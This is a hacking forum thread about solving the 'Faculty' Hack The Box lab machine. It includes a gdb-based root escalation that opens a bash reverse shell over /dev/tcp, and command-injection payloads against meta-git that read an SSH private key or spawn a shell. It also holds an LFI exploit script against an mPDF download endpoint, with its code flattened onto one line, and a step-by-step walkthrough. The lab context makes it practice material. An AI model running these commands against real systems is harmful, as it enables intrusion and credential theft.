(July 3, 2022, 12:10 PM)HolesInSec Wrote:

(July 3, 2022, 09:26 AM)hacker1111 Wrote: For Root:

export PID=$(ps aux | grep "^root.*python3" | awk '{print $2}')

gdb -p $PID

call (void)system("bash -c 'bash -i >& /dev/tcp/10.10.x.x/9001 0>&1'")

why is Attaching to process $PID possible with only user developer

only root (user) and debug (group) have exec. permission in /usr/bin/gdb
and developer is part of debug group

---

(July 3, 2022, 09:25 AM)Exa Wrote:

(July 3, 2022, 07:21 AM)hacker1111 Wrote:

(July 3, 2022, 07:11 AM)quick443 Wrote: finally got a user but I can not escalate to developer, with the payload that someone said before

sudo -u developer /usr/local/bin/meta-git clone 'test||cat /home/developer/.ssh/id_rsa'

meta git cloning into 'test||cat /home/developer/.ssh/id_rsa' at id_rsa

id_rsa:
id_rsa: command 'git clone test||cat /home/developer/.ssh/id_rsa id_rsa' exited with error: Error: spawnSync /bin/sh EACCES

use this from /tmp directory and u can just do this

sudo -u developer /usr/local/bin/meta-git clone 'test||bash'

Thanks, the /tmp directory did the trick. Apparently, the developer user must have read access to the current directory. So running the command from /home/gbyolo/ won't work.

yes :)

(July 2, 2022, 10:11 PM)Bumper111 Wrote: SSH for user: developer

Thanks....
The problem with people getting ssh without actually completing the challenge that people can get banned
The

Tbh leeching the ssh key will only give you status and rep on HTB while you'll still learn nothing Learning something will benefit you in the future as wellAnyway here's a simple python script i wrote to ease the LFINote: Its a cmd loop and you just need to run the script and input your desired file to readExample:python lfi.py /etc/passwdWill output the pdf file from which has the attachment to /etc/passwd and copy the web address to your clipboardYou can then download the /etc/passwd as attachmentI'll improve the script later on to read the attachment[code]import requestsimport base64import sysimport cmdimport clipboarddef getFile(fname):#fname = sys.argv[1] payload = f"""""".encode() payload_b64 = base64.b64encode(payload).decode() headers = {"Cookie":"PHPSESSID=m27i0ofuv08082t7csmrhcr96e"} data = {"pdf":payload_b64} r = requests.post("http://faculty.htb/admin/download.php", data=data, headers=headers) if "pdf" in r.text: print("http://faculty.htb/mpdf/tmp/"+r.text) clipboard.copy("http://faculty.htb/mpdf/tmp/"+r.text.strip()) else: print("No such file") class LFI(cmd.Cmd): prompt = "LFI > " def default(self,args): print(getFile(args)) LFI().cmdloop()[/code]

(July 2, 2022, 10:11 PM)Bumper111 Wrote: SSH for user: developer

Thx man

(July 2, 2022, 10:11 PM)Bumper111 Wrote: SSH for user: developer

awesome

[quote="langetmama11" pid="121517" dateline="1656864135"]Tbh leeching the ssh key will only give you status and rep on HTB while you'll still learn nothing Learning something will benefit you in the future as wellAnyway here's a simple python script i wrote to ease the LFINote: Its a cmd loop and you just need to run the script and input your desired file to readExample:python lfi.py /etc/passwdWill output the pdf file from which has the attachment to /etc/passwd and copy the web address to your clipboardYou can then download the /etc/passwd as attachmentI'll improve the script later on to read the attachment[code]import requestsimport base64import sysimport cmdimport clipboarddef getFile(fname):#fname = sys.argv[1] payload = f"""""".encode() payload_b64 = base64.b64encode(payload).decode() headers = {"Cookie":"PHPSESSID=m27i0ofuv08082t7csmrhcr96e"} data = {"pdf":payload_b64} r = requests.post("http://faculty.htb/admin/download.php", data=data, headers=headers) if "pdf" in r.text: print("http://faculty.htb/mpdf/tmp/"+r.text) clipboard.copy("http://faculty.htb/mpdf/tmp/"+r.text.strip()) else: print("No such file") class LFI(cmd.Cmd): prompt = "LFI > " def default(self,args): print(getFile(args)) LFI().cmdloop()[/code][/quote]Thanks !!

For those who really want to learn how this machine is intended to be exploited:

- Only 2 ports 22 (SSH) and 80 (HTTP)
- Browsing to the page you will get redirected to a domain (xxxx.htb). Add it to yout /etc/hosts.
- You have now a "login" page. If you try with a simple SQL injection, you will be able to bypass it. If you want a list of queries, here you have.
- Once you are "logged in" you will get the name of the Platform "School XXXXX XXXXX XXXX", a quick Google search will give you a new directory/endpoint (otherwise you can fuzz it :D)
- Once there, you have an option to download a PDF, that redirects you to a generated PDF, you can check the version of the framework behind it. 
- Another Google search will guide you, and you will now have an exploit (in this post you have a lot of references to the exploit...) [PD: The correct encoding way for the exploit is-> urlencode + urlencode + base64 ]
- Once you have LFI, you can start reading all along the system, a great way to get in is searching for usual locations, like index.php - login.php - db_connect.php - etc. (@exa gave out a very great way to get the credentials ;) ) 
- Try login in with that credentials that you found + /etc/passwd's users.
- If you are already in and you have a password, normally you do "sudo -l" to check if you can run something as another user.
- Google that binary and you will make a lateral movement to the user.
- Once here, you will start enumerating again (you can use LinPeas, but it's not necessary in this machine...)
- Are you CAPABLE of something? Are you in any interesting GROUP? I think you got it...
- GTFOBins will help you a little, but not too much... Search for what is used that binary that you found... Are you able to attach to something? Maybe a process running as root?
- Get that PID, attach to it, and get your reverse shell.
- Read the root flag :D

Almost everything is already in this post, but here it is all together.

SSH for user: developer

tyyyyyy